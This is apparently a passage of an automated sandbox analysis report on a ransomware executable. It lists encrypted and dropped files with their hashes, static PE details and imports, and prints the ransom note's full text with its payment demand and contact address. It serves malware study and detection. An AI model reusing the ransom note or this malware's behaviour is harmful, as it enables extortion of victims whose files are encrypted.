                                                                                                                          Preview:MZ....s>....R..\....E...8..2.L...C_.kD.hK....:..............Q./..Q.mR.A......R.<.r.lA..`.^.P.@.]y...........f..;...}[..1.4....)..N.t.mZ.W...Pa........{.k..l....s...UZ_.wM..oI...N*Z...eR...@U.......WJ....@.D2.[U.yr.L.kc..8..e....{..RT.:...).Q.?..-.6.sr........%.A4.Y...i.e.e.M}b.._......H.-W.Vy{.U..=,.+.....<..}.#.0O.k....<.U..:8..9.J....c......b.. /^......*I..4..\.]A..(da.]....B`.)..q;...C?].h.ZRu..N......7.........=..#GU.4.wrH.I...`.e..p.&D.O...}..>["5Y.{k.^....T...~.*....p.0.94o.T.z.&.K.T..'.....S*.'........I....]c.c.[.0.S.>.O.w....."...K{5s..a.!......6V.......d....y.hRS...f?b.........w..q..VW..z.....2...QT~.].$&..f..?.~:co.....4.7R...f..<.H..k...l.h.;....:......,h.VA..;.....g.+..l.G..|)e.K.Ml...k:..QW&..5z..[/T.4.r......+$.M..O.........).2I[......#.48|.K.(i`....e]%..^:.f.....f..)2...4D..N...}[._.........D..c....1...C..c...z.....g.9......}...uV.l....~>...Kw#x.4j...j..PW...BP.2IP..+nF..S,.I.Y..e.t...y..E..o.. y....sg]..k.S^<...2.z

                                                                                                                          C:\Users\user\Local Settings\Temp\wmsetup.log.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1031
                                                                                                                          Entropy (8bit):7.791444397670549
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:tarFjT3p29DMuyO3WYsKIS8Q0iprxXF+0hfoozmgv+bD:wJj929QWWZhxinF+0hf6BD
                                                                                                                          MD5:8DE5FA156277731D6ABDA92994182EA1
                                                                                                                          SHA1:357779537E3BC7A1238369B162452594543E862B
                                                                                                                          SHA-256:9318ED9E127F3AB0A97CED2968BC0BE30C86B18F75E4D5D54B78F836F22B1783
                                                                                                                          SHA-512:3F1C43F15ED595E98C3328B777294426A26CCAEA621086631D973DB0B7069B3963CBC6FD70199018146C27FF4718679CCE536CF15FE62F0A5D0BBFD4FFB4B847
                                                                                                                          Malicious:false
                                                                                                                          Preview:..[*W....`.<......).{n.....y....X......o%...<. t.....h..z?L.I54w..../a..H......h..Fs...o...ov...AD..2\g3...0o-G.<.<".?.....+.K...?."...5.\Q..y88..-\..b.i"U..........,.6.k...CWEt..%........o8..`.<....:+.(`=^5'_..7.9......6....u...I[....N.a.ju......QAL?mH,..1."....a.......'j...E.]}....I..>'.0....Gg.......'.....Z..8Sl..f..GZ.-...N.]I...6S..X..8Eh...].f8..zgvst...;SF.2.?@....t..R.I...f...Y..........C..V.=..d.g-L.?P.*.r.r..7=......o[/..(<jK..%Ue.5...e.X^p.|d.4..+Z1.:.....Z.x+.=.../6.+[K6..D.....~..5 n..{t...:.X}.5.nj...x....y...9.$[o.&.f}Z......O<..C.d{`G...Y..%..F..7.;.G<p.4.q..>.d..A..)..+.....b^....1..8A*..Sy@...>.&.h.D.W...\d......D../.O.'t.{...c...A._.O..*\.....Pd/.h}...r.k..&.o.BA."..1...'B,_....:.....IO.......W+S.f.W........!po....)..".E=v$..3&..0h....&.t...r}........U`Q.~.=..'.T..O^&...T..{.........9.....Z..k.8pH&..qG6....c..s...7<G0. .....x..U6.K..S......O..../..[.fs#"B.*....O....X.J..Wzp...phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698

                                                                                                                          C:\Users\user\Local Settings\Temp\{02662522-698F-45B5-959E-0EC7B36298AD}.png.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):6130
                                                                                                                          Entropy (8bit):7.966504954439117
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:Bgkrnsac3ui3XHTvyKo49UB/mdMZeAAZHrrbekpZ17dMNlcaCgzvpPuXZbsQCNzn:BRnsaPiTqKJdMZ3OHrnpZ172NxjvpWXs
                                                                                                                          MD5:956439A2AF2EC5F8FD5CB92EC75C80A6
                                                                                                                          SHA1:6D584F6106C4EB19D07DE2BD32BD794ED2486645
                                                                                                                          SHA-256:08549B360A06A1169BD482981C1009BA7131705ED87C97B815582E8909A9F8E7
                                                                                                                          SHA-512:F3EBA9EDC5938E6244A25A470E0B0A2AD50C43A4CB399206909F1E368D9A992EAFE73FC1641A8556E316CA7C810EDEB2717FE4958B1553EE54B576C7840CF468
                                                                                                                          Malicious:false
                                                                                                                          Preview:.PNG.2K.#..Ai.....&...{..LH...../2...H..8u....8....[.....7-.....!..\T.d.."G."o(...Y."....>...........oWX..z...6P........@...|1..7..$.F0.w.....u..O[Xa...F.7.A..?.8..N...`...T...?...=....9X.d`.. :....@..?8..}y.nX..Ez...5...n.l.,..Se.\..Io.g.......^\$...Z.!H.Rf..$....@......Q....6.LL.%...a...fI....!..b\.Z...W..F.&.s1.wK..d.[m.u.v..iB....XE....Ve..\I/.S..e.(.hKC.u..x.q.....LY.5.......cJ....>N.I.|........n#..a.h.S.#..J....Y...q..$.}.fZ.v.uz.t...Dy....0.{{.~t.=]7.v.*G...0...Y.........f....ES....I.?q...J0#k:w.....(....=.3.Mt;Ji......uc.,.Y...x.....W..jt..=y..=...V .$.yqS.)8.C_.Z...4i.$Z(..J>.....m.K.zy{U}4z...\.........0....L&m....gf+[....>.He*F..3'.J+`)..>..d.1.z!.G.x..>Mj..7S.t2nW.D.u.bmXx.@.sW$.d}..Y..........3`q*.Y...9..^\BB....|. =......xY.j.e......W.c.x.0.Z...c..R..5.....A.....W|a...T..{.|3...R3.......4..Z.GK...Q....I..o_\....W./..M........a.B.@.{..0.....n...Ow....f;f.ao+.O.c...=.+....T.],....1%"6....)...s..N. .8.Z.L.j.^...........h.K.....

                                                                                                                          C:\Users\user\Local Settings\Temp\{139BFC28-947F-45CC-9DE4-AB0FCAEF6E9F}.png.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):6130
                                                                                                                          Entropy (8bit):7.971644330675514
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:j3JRx+TXqBeUx5JdQGwLajo2cZBqBU4HJy5DYbP+DIbCYbnu6hqTBRwUamjrm:TJR6a0Ux5Jdjn/BX2EqIbCC0BRJa
                                                                                                                          MD5:A2933FA70957AF6A556505C22DDA5071
                                                                                                                          SHA1:67F0ADF5F3379F7E040B41CF7B4C05BA6D01803E
                                                                                                                          SHA-256:E65A42D1B72BDB2651D3C6C3EAAFC6BE3EC8B576C302E4C4F69C4423E56ED7EA
                                                                                                                          SHA-512:B8A92612E47263A752F00C8056298E69A7F7F3097B75623A01C3C07A846B7682B01396BB2D5ADB40C2D47DF3DED13AE801B56EA485C57349C4AE615D717964EF
                                                                                                                          Malicious:false
                                                                                                                          Preview:.PNG.~.2.Q..`.A..z[..E....R.,e.Fg..V=d..(,.T.]G.'v>B.4.)m..p.x5...."...9P...W..jaD..oC.(..>G5.....*..U.ls....H.......R.;`M..d..B....pm..O......_.k..n.^..o.h.WS.q....=.Dj-.tG.X.....>L..0.)J.. ...0o.;V..P.. #Y.*d.,.......B...p.Hv.)..whW(....d.>.....o\.P!T*H.B.U.Ta(:.....t.4)..C.WT.......9K....dp.n...i...B^(.....l.U...6|..z..S..A.._,.H ..1..B.8a.Q.]`um>....n....ohBw2K.r....~.>....p]?.{wp.p..)..d....d.Vk.`.zJP.B..f"....m.<r..K@.+.yoCs>..3$.........u.......?..h)j}#..0-.J1.Z...z_..cU.Y.b.O+e..Gzw.h>....~.K...R..m...s.:...x~.I.3.7."...A.0......e..3.Z..6h.b........H7....2..?t.L....*..4.H.XR..{l..C....^.%...'.j.U.F#..Mt....},..Z.r.H(...su.w[.....pN...6...Z.Q..7...'D.k....P.."x.../.).%V..n...O. .w]x....dFC?4.c.c...%......-...xa.@.....-.y.!m.q4....T........i.....%.5\.!..9...+,..`.8.Ku.l.Fn.=....f......LO......p..R.L..j..[.7...`z.+K..7..1..3....~.u.`KK.,.r....X.V.<,....&x....K.:3...<.QyB.....sW"....\.0...i...U.^..Z5%..2.z..z..f..t.;..]..!1+.R4!...N.6G....

                                                                                                                          C:\Users\user\Local Settings\Temp\{5871238D-BEB9-464A-931F-701C8F0FFB10}.png.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):6130
                                                                                                                          Entropy (8bit):7.969210732176863
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:yNfKdE3Chv3OX2NPj5RmiH0qWB8vNYgl3zrgI5hKl0sBJ6sPHrsE8aWzfwT4V115:bE3Chv+X2VjrmNCi0vnql0sBFvdkwTsd
                                                                                                                          MD5:731208DB8E5F4B056A29B000B6F67974
                                                                                                                          SHA1:928F35917B1A07C1D889823F508594418CDF885A
                                                                                                                          SHA-256:D64A76C0F77E01CB468CF39E88EEF98F191CF78B08B5723A4866EB61DCDC09F6
                                                                                                                          SHA-512:083D8131E4F5B875F804B4557977951669ED7F31BB98E599688C62AF2DF34D5E28FCCD3DA1AD4762397F5C0A19905B19A7FA743CE4B896ED2FA3A900BA1B6E1D
                                                                                                                          Malicious:false
                                                                                                                          Preview:.PNG.....\).wAEV...".N|.yP<-..p....4o.....kl.p.;.76.k...A.5...../...:}*_P.....5..E.Jt....o...(..,>R...WG.,.~.......<..np....Y!6..6......v0.......l....w.#...3.O%E*.I"=./`..%.........h.C....;..Z].e._...3.e..Jg=...[..,.o.X.j.L.]+....][.l.'UXh.IU.....(...Y.(q......h.\..a.s.gWY.5...C....uY........vw.F./....x. ...6...aA.qA.f.).yo.%......."........(J..%....8.C6:*`.A..`.[..r....~...v.ZL.l9.\"Z..R.....&.._..T^k0.2.0...Y8.VB...%B....V_..F.}.>...P....eJ.Q...n....i>.fa...].~.D.A...Y.`..y..d.....~%.PX...=.V..H..r...Y|].'.....L..(5..u.#Kl.b A...U..sj..>....c#b...A.0. $].....+.Q.;....... .=.....&.z...S......a.)3.... l...."...f.3;.:.#.:g....%zn..m+.]7s.u.......A";Y...^J5..w......YETF...6p&/..mt.....g.....t.l.Ll.a[M.x.n.N..#.dgI.<i.r.Tj...2l2..+.9X0.`E......q..&C..x......SK..9S.:1.>.D.ffi....*):.~Fr.hM...=O...x..q4....8......k..8........A....7dk...Ih.y_.....n@S.g}.4.U..`r..dO.<.#......8..E.."4...CSs...Y....35..B....c...i...<..%(..l.|..K....U....,....g..!`

                                                                                                                          C:\Users\user\Local Settings\Temp\{5F969F84-5F34-4AF8-8D36-D6D6A1668750}.png.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):6130
                                                                                                                          Entropy (8bit):7.9717368275538085
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:6N4YXcLxnenyNtSeGoQnZ9gaIGfVSPR3o+yTaUhI3TzU4x8eHETp5XaSwrrQgpr0:MQxe4tSv9YcVkR3LyTOTY4AT7lASm5m
                                                                                                                          MD5:9FC21C4960B54572B4E2C4659ACE873A
                                                                                                                          SHA1:9A4E84BFD7C56C1CD0FCD3604C8EDAFB3FDA0AEB
                                                                                                                          SHA-256:78942BBFEA6C1BF52CF16266EA334EBB6097F53E132ED7A9930DA7D17874759D
                                                                                                                          SHA-512:675032ED5C8783A737769D3D3ECFA6913293D92294A9D6978946052EACF88722B71D54696751EEB1B3350A62864ED1E70B8E58411D9613F5E51DB6E13C80F090
                                                                                                                          Malicious:false
                                                                                                                          Preview:.PNG.....w.1h.WQ.z.&..C....C.P.'G..,..R.P.rZ...a..NJq..?.V...G..v8.T.....".e...}.S..f..E....c.X.P.OB..?\l...2=..}`...P.W...Q....Qr...d.....].R.[........]$.._.RW..VQ.P7<,P..=X.d.@;.A..1.....;.z/\...u.y..t.......'_....a.=f..[...Qe...$......@[.s..1.....HvK?.0_).....;...#.i..)o..../.B.~...2.Rn,.f.:8..f.ozc..{_7.0...12.L.50.... a..H.".....G.B..........[..<.s{..6S5...%*Eo#hl.Mh^B.....a@(.'.~d..m.......5.&/.\.g+..j.N#..j^.P....a.>}....g..pJ..l'g...Az..0..G....r...I...{...#..7.(g.O... ....$;.i-].e......x;`:..c.L, ..'U..YV....."c;..i.a'..i.Os.{2.....*..#.@{4.}.....6.x..........W..R...'..h...7....omj..\.{...zJ..j...>[FD}Q...U....?...z.._.r+m.U%.Fm..q6.....F.U..D..A7.D..q....%..<..R.M..r.....1R._.b...'X....h.}.......)-ri.q.b4o.rt...5./k..~Gx.Ul.'`.....]...gQ\..1M ~.1......5]..(.g..k.]C...9.P.l...l...LB.......ma...4<.2)(V.[.E..HSk<.W._<m...8.]......i.s+.......?t(\O.>Ak..#o.......w..... .W...B...uR..N8........@6..../.]...!E{.......+>.w.o;..(1I.....

                                                                                                                          C:\Users\user\Searches\winrt--{S-1-5-21-2246122658-3693405117-2476756634-1002}-.searchconnector-ms

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1193
                                                                                                                          Entropy (8bit):7.835252415559237
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:DwTyQsCmy94KIjcZLNPaprxGq5d3gBirDsVU6JLxMevMUwuubD:DwGy94BjqC3gEelM2MrTD
                                                                                                                          MD5:4FD5012A93C09ACDD723EF234F47618D
                                                                                                                          SHA1:CA4A2F3C2FB75D02BAC179489BF807EFB49DF11A
                                                                                                                          SHA-256:751077FC4AC7996C2F6A9FCD3D63DEA695D3687E498E3A9B23254E4014F12C1F
                                                                                                                          SHA-512:0929052B1AFF447B02128830DE20F893385AE9B63BDBFD422DCF7A5BC7A9C9B522A5A920FB5C5C9B7198D660F702213951F405B15A2D27904FB8F3B39227A64B
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.~..B.'0.N..D.....-yb..ztrG6.>..<G..+.s.8..DB._..w9. z~..... ..?......8j.qN ..s..R..Y.X<..9..)l.y!E.."..*..F..-..1|.9.A.a&.. .0.i....|...:0..A.~.Q.^.K..].,l.,..?.KL.}....=W..u...=.BoIwI...u....e...\...&...9d.C..O....)qL.~.F....j#.w3.e@fxc.!.r...|...."`............s.^o......M..H8..:s..i..}U.P....]...(.@....t.. .r....{*5(=..<.."Lc...P.9*.U.8......p.t...>.k..gA|.....d..K..E.i...]^.z..^!..I..Eu,.j....%.....t...... .n.`..c.0.'S..B...ho..;.........5....W..,......y".$Z.{..........@.%.......Lh.{.....+.dH3..Iu.w.\-...M~...n...z.%&Cht...(...v.V..}.W.n..R.{e...kad\.;....5.6f..G...Q....[3.3.cB2s..-b..ht.P[N#d..s..M.|.?9T..........w&......8uVs/....M....T.!C......;.'..Cd.......[.7.nE...}k.ckwP07.P..%w.3....6.......dG_5{.......5... ......4NW'!j._......'.f.bWw]1.1..0...VL.(Lj.....@g..':...C...GxC.W[#.}s.C.{..N~.l.vYkZ..?..k.....P.X..%.wg..*.^.<.....).....!..K..S..(.f.B....7`h....;..7O...(...'.W....h..r.-.O+..c@.)N./g.:..R.iD......7w.%Fo..y.

                                                                                                                          C:\Users\user\Searches\winrt--{S-1-5-21-2246122658-3693405117-2476756634-1002}-.searchconnector-ms.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1193
                                                                                                                          Entropy (8bit):7.835252415559237
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:DwTyQsCmy94KIjcZLNPaprxGq5d3gBirDsVU6JLxMevMUwuubD:DwGy94BjqC3gEelM2MrTD
                                                                                                                          MD5:4FD5012A93C09ACDD723EF234F47618D
                                                                                                                          SHA1:CA4A2F3C2FB75D02BAC179489BF807EFB49DF11A
                                                                                                                          SHA-256:751077FC4AC7996C2F6A9FCD3D63DEA695D3687E498E3A9B23254E4014F12C1F
                                                                                                                          SHA-512:0929052B1AFF447B02128830DE20F893385AE9B63BDBFD422DCF7A5BC7A9C9B522A5A920FB5C5C9B7198D660F702213951F405B15A2D27904FB8F3B39227A64B
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.~..B.'0.N..D.....-yb..ztrG6.>..<G..+.s.8..DB._..w9. z~..... ..?......8j.qN ..s..R..Y.X<..9..)l.y!E.."..*..F..-..1|.9.A.a&.. .0.i....|...:0..A.~.Q.^.K..].,l.,..?.KL.}....=W..u...=.BoIwI...u....e...\...&...9d.C..O....)qL.~.F....j#.w3.e@fxc.!.r...|...."`............s.^o......M..H8..:s..i..}U.P....]...(.@....t.. .r....{*5(=..<.."Lc...P.9*.U.8......p.t...>.k..gA|.....d..K..E.i...]^.z..^!..I..Eu,.j....%.....t...... .n.`..c.0.'S..B...ho..;.........5....W..,......y".$Z.{..........@.%.......Lh.{.....+.dH3..Iu.w.\-...M~...n...z.%&Cht...(...v.V..}.W.n..R.{e...kad\.;....5.6f..G...Q....[3.3.cB2s..-b..ht.P[N#d..s..M.|.?9T..........w&......8uVs/....M....T.!C......;.'..Cd.......[.7.nE...}k.ckwP07.P..%w.3....6.......dG_5{.......5... ......4NW'!j._......'.f.bWw]1.1..0...VL.(Lj.....@g..':...C...GxC.W[#.}s.C.{..N~.l.vYkZ..?..k.....P.X..%.wg..*.^.<.....).....!..K..S..(.f.B....7`h....;..7O...(...'.W....h..r.-.O+..c@.)N./g.:..R.iD......7w.%Fo..y.

                                                                                                                          C:\Users\user\_readme.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1114
                                                                                                                          Entropy (8bit):4.8507609806808425
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:FS5ZHPnIekFQjhRe9bgnYLuW6mFRqrl3W4kA+GT/kF5M2/kLw3KTJ9:WZHfv0p6W6PFWrDGT0f/krL
                                                                                                                          MD5:C9EBD4B64892564AAC94137841AD9D33
                                                                                                                          SHA1:B4EA6ADA547A695BDEBAF7F06B0EFFD927BFF4AF
                                                                                                                          SHA-256:6D8E4E47B5EBCAF5E3AFD98F217D5BF60E40B9031C5DE191D51AAE8B57515B2B
                                                                                                                          SHA-512:C515C0F63CA4C23E4FF2D673AAF4DF1F9F4CFDC90C5E7205EA161B9DC81F69AC329775876E26E4BF4DC18D9229ED82B2512D9872B44FA4F22CFFE61F212EF328
                                                                                                                          Malicious:true
                                                                                                                          Preview:ATTENTION!....Don't worry, you can return all your files!..All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key...The only method of recovering files is to purchase decrypt tool and unique key for you...This software will decrypt all your encrypted files...What guarantees you have?..You can send one of your encrypted file from your PC and we decrypt it for free...But we can decrypt only 1 file for free. File must not contain valuable information...You can get and look video overview decrypt tool:..https://we.tl/t-eyUsqpKbFl..Price of private key and decrypt software is $980...Discount 50% available if you contact us first 72 hours, that's price for you is $490...Please note that you'll never restore your data without payment...Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours.......To get this software you need write on our e-mail:..support@freshmail.top....Reserve e-mail address

                                                                                                                          Static File Info

                                                                                                                          General

                                                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                          Entropy (8bit):6.657215273984881
                                                                                                                          TrID:
                                                                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                          File name:3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File size:1'150'976 bytes
                                                                                                                          MD5:de93e8a0692db2c2f178270b8da7b5d7
                                                                                                                          SHA1:21df7a70852c9d47b3423d14005bf67a69e6fdcc
                                                                                                                          SHA256:1ca8ad78274a829697b8381e96b914fea1a65b5b2351f536325d2143d689426e
                                                                                                                          SHA512:55b21170027f3e3dc2ca8f1d6678b054f270ca7d5e9ac71eec7a4e630ed007a0de07bcb8134431fb4a0d4c99fabf235911cc0322080920bb407748e4422b0d4a
                                                                                                                          SSDEEP:24576:ZBUIKn/vwOXGUXAjCymYZiVtElVIBT2roqnTSSxWeT/dRPOO8UWQHUq7:F0dwAYZt6C31WeTVRPOhU7Uq7
                                                                                                                          TLSH:B735AE02BB819171E5D341BA0DFE977E883AA9A0933A95C3D7E91C568E306D0673F3C5
                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......(O..l...l...l.....7.f.......+/..*...h.....9.m...../.m...a|..Q...a|7.s...a|........&.n.....8.n.....#.M...l...........d...a|3.m..

                                                                                                                          File Icon

                                                                                                                          Icon Hash:90cececece8e8eb0

                                                                                                                          Static PE Info

                                                                                                                          General

                                                                                                                          Entrypoint:0x424141
                                                                                                                          Entrypoint Section:.text
                                                                                                                          Digitally signed:false
                                                                                                                          Imagebase:0x400000
                                                                                                                          Subsystem:windows gui
                                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                          Time Stamp:0x5D890137 [Mon Sep 23 17:30:31 2019 UTC]
                                                                                                                          TLS Callbacks:
                                                                                                                          CLR (.Net) Version:
                                                                                                                          OS Version Major:5
                                                                                                                          OS Version Minor:1
                                                                                                                          File Version Major:5
                                                                                                                          File Version Minor:1
                                                                                                                          Subsystem Version Major:5
                                                                                                                          Subsystem Version Minor:1
                                                                                                                          Import Hash:0c756c849bc7b459f78f7a5ce46cd4a7

                                                                                                                          Entrypoint Preview

                                                                                                                          Instruction
                                                                                                                          call 00007FE87976DB02h
                                                                                                                          jmp 00007FE87975F7FEh
                                                                                                                          jmp 00007FE87975FB1Ch
                                                                                                                          push ebp
                                                                                                                          mov ebp, esp
                                                                                                                          push dword ptr [ebp+18h]
                                                                                                                          push dword ptr [ebp+14h]
                                                                                                                          push dword ptr [ebp+10h]
                                                                                                                          push dword ptr [ebp+0Ch]
                                                                                                                          push dword ptr [ebp+08h]
                                                                                                                          call 00007FE87975FB5Bh
                                                                                                                          int3
                                                                                                                          push ebp
                                                                                                                          mov ebp, esp
                                                                                                                          sub esp, 00000328h
                                                                                                                          mov eax, dword ptr [0050AD20h]
                                                                                                                          xor eax, ebp
                                                                                                                          mov dword ptr [ebp-04h], eax
                                                                                                                          cmp dword ptr [ebp+08h], FFFFFFFFh
                                                                                                                          push edi
                                                                                                                          je 00007FE87975F9CBh
                                                                                                                          push dword ptr [ebp+08h]
                                                                                                                          call 00007FE87976E2A4h
                                                                                                                          pop ecx
                                                                                                                          and dword ptr [ebp-00000320h], 00000000h
                                                                                                                          lea eax, dword ptr [ebp-0000031Ch]
                                                                                                                          push 0000004Ch
                                                                                                                          push 00000000h
                                                                                                                          push eax
                                                                                                                          call 00007FE879766C43h
                                                                                                                          lea eax, dword ptr [ebp-00000320h]
                                                                                                                          add esp, 0Ch
                                                                                                                          mov dword ptr [ebp-00000328h], eax
                                                                                                                          lea eax, dword ptr [ebp-000002D0h]
                                                                                                                          mov dword ptr [ebp-00000324h], eax
                                                                                                                          mov dword ptr [ebp-00000220h], eax
                                                                                                                          mov dword ptr [ebp-00000224h], ecx
                                                                                                                          mov dword ptr [ebp-00000228h], edx
                                                                                                                          mov dword ptr [ebp-0000022Ch], ebx
                                                                                                                          mov dword ptr [ebp-00000230h], esi
                                                                                                                          mov dword ptr [ebp-00000234h], edi
                                                                                                                          mov word ptr [ebp-00000208h], ss
                                                                                                                          mov word ptr [ebp-00000214h], cs
                                                                                                                          mov word ptr [ebp-00000238h], ds
                                                                                                                          mov word ptr [ebp-0000023Ch], es
                                                                                                                          mov word ptr [ebp-00000240h], fs
                                                                                                                          mov word ptr [ebp+0000FDBCh], gs

                                                                                                                          Rich Headers

                                                                                                                          Programming Language:
                                                                                                                          • [ASM] VS2013 UPD5 build 40629
                                                                                                                          • [ C ] VS2013 UPD5 build 40629
                                                                                                                          • [C++] VS2013 build 21005
                                                                                                                          • [ASM] VS2013 build 21005
                                                                                                                          • [ C ] VS2013 build 21005
                                                                                                                          • [RES] VS2013 build 21005
                                                                                                                          • [LNK] VS2013 UPD5 build 40629

                                                                                                                          Data Directories

                                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x1085d00x154.rdata
                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x12b0000x1e0.rsrc
                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x12c0000xa32c.reloc
                                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0xcc4600x38.rdata
                                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x105ac80x40.rdata
                                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0xcc0000x3f0.rdata
                                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                          Sections

                                                                                                                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                          .text0x10000xca5bc0xca600False0.5030461029184682data6.570129941575212IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                          .rdata0xcc0000x3dba20x3dc00False0.39569758982793524data5.668210848214326IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                          .data0x10a0000x203580x6400False0.4978125data4.939624310736174IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                          .rsrc0x12b0000x1e00x200False0.533203125data4.7176788329467545IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                          .reloc0x12c0000xa32c0xa400False0.6199980945121951data6.612523450234696IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                          Resources

                                                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                          RT_MANIFEST0x12b0600x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727

                                                                                                                          Imports

                                                                                                                          DLLImport
                                                                                                                          RPCRT4.dllRpcStringFreeW, UuidCreate, UuidToStringW, RpcStringFreeA, UuidToStringA
                                                                                                                          MPR.dllWNetOpenEnumW, WNetEnumResourceW, WNetCloseEnum
                                                                                                                          WININET.dllInternetCloseHandle, InternetReadFile, InternetOpenUrlW, InternetOpenW, HttpQueryInfoW, InternetOpenA, InternetOpenUrlA
                                                                                                                          WINMM.dlltimeGetTime
                                                                                                                          SHLWAPI.dllPathAppendA, PathFindFileNameW, PathRemoveFileSpecW, PathFileExistsA, PathFileExistsW, PathAppendW, PathFindExtensionW
